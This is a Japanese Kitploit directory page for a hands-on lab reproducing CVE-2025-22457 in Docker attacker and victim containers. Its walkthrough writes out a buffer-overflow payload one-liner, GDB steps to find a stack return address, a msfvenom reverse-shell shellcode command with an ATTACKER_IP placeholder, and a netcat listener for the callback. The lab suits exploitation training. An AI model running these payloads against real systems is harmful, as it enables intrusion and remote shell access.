Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-22457-vulnserver-lab — CVE-2025-22457を再現するハンズオンラボ:Dockerの攻撃者/被害者コンテナをセットアップし、GDBでスタックアドレスを特定し、msfvenomのリバースシェルエクスプロイトを実行します。 | Kitploit
ツール/GitHubGitHub/donofly/cve-2025-22457-vulnserver-lab
ペイロード生成脆弱性分析エクスプロイトシェルコードCTFペネトレーションテスト学習と教育バイナリエクスプロイトラボと実践

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubdonofly/cve-2025-22457-vulnserver-lab

CVE-2025-22457-vulnserver-lab

CVE-2025-22457を再現するハンズオンラボ:Dockerの攻撃者/被害者コンテナをセットアップし、GDBでスタックアドレスを特定し、msfvenomのリバースシェルエクスプロイトを実行します。

リポジトリを見る
11日前未レビュー

step 1 環境設定

権限と実行スクリプト

Windowsを使用する場合は、wslを開いて実行できます

root@kitploit:~
chmod +x setup_environment.sh
./setup_environment.sh

step 2:動的な値の探索 (手動の手順が必要)

メモリアドレスとIPは環境ごとに動的に変わるため、手動で見つけてexploit.pyスクリプトを更新する必要があります。

2.0 まず2つのattacker dockerと1つのvictim dockerを起動して、後続の準備をします

root@kitploit:~
docker exec -it atac /bin/bash
docker exec -it vic /bin/bash

2.1 stack_address (戻りアドレス) の探索

この手順の目標は、payloadが正確にジャンプできるよう、安定したスタックアドレスを見つけることです。

1. victim dockerでGDBを起動
root@kitploit:~
gdb ./vulnserver
2. strcpy関数の後にブレークポイントを設定
root@kitploit:~
(gdb) b strcpy
3. プログラムを実行し、vulnserverがリッスンを開始
root@kitploit:~
(gdb) run

ブレークポイントをトリガー: attacker dockerを使用し、以下のコマンドを実行してテストpayloadを送信します。これによりGDBがブレークポイントで停止します。 注意: <VICTIM_IP>を手順1で表示されたVictim IPに置き換えてください。

root@kitploit:~
python3 -c 'import socket; s = socket.socket(); s.connect(("<VICTIM_IP>", 9999)); s.send(b"A"*516 + b"BBBB" + b"C"*300); s.close()'

アドレスを見つけて記録: GDBがあるターミナルウィンドウに戻ると、プログラムはすでに停止しているはずです。以下のコマンドを実行してスタックを確認します:

root@kitploit:~
(gdb) x/200wx $esp

出力の中で、0x43434343 ('C'を表す) で構成される領域を見つけます。この領域の中央から適当に1つのアドレス (例えば 0xffffd580) を選んでコピーします。これがstack_addressです。

2.2 exploit.pyを更新し、buf (Shellcode) を生成

stack_addressの更新:

テキストエディタでexploit.py内のstack_addressを、先ほどコピーしたaddressに更新します

buf (Shellcode) の生成と更新:

attackerコンテナのシェルで、msfvenomコマンドを実行してshellcodeを生成します。 注意: <ATTACKER_IP>を手順1で表示されたAttacker IPに置き換えてください。

root@kitploit:~
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -b '\x00' -f python

msfvenomが出力したbuf = b""... コード全体をコピーし、exploit.pyファイル内の既存のbuf変数部分を完全に置き換えます。

step 3 : 攻撃の実行

リスナーの起動: いずれかのattackerコンテナのシェルウィンドウで、以下のコマンドを実行してnetcatリスナーを起動します。

root@kitploit:~
nc -lvnp 4444

victimの接続開放:

以下の2つの方法が使用できます 方法1

root@kitploit:~
./vulnserver

方法2

root@kitploit:~
gdb ./vulnserver
gef➤  run

攻撃スクリプトの実行: attacker dockerで更新済みのexploit.pyを実行します。(注意:<victim_ip>を手順1で表示されたvictim ipに更新してください)

root@kitploit:~
python3 exploit.py <victim_ip>

結果の確認: netcatリスナーがあるウィンドウに切り替えます。すべてうまくいけば、接続が確立され、対話可能なshellが取得できます。whoami、ls -laなどのコマンドを入力して確認できます。

step 4 : 環境のクリーンアップ

GDBとコンテナの終了:
root@kitploit:~
GDBでquitを入力し、その後コンテナシェルでexitを入力します。

以下のコマンドを実行して、すべてのコンテナとネットワークを停止・クリーンアップできます。

root@kitploit:~
docker stop vic atac
docker network rm 111550082_net
ツールをダウンロード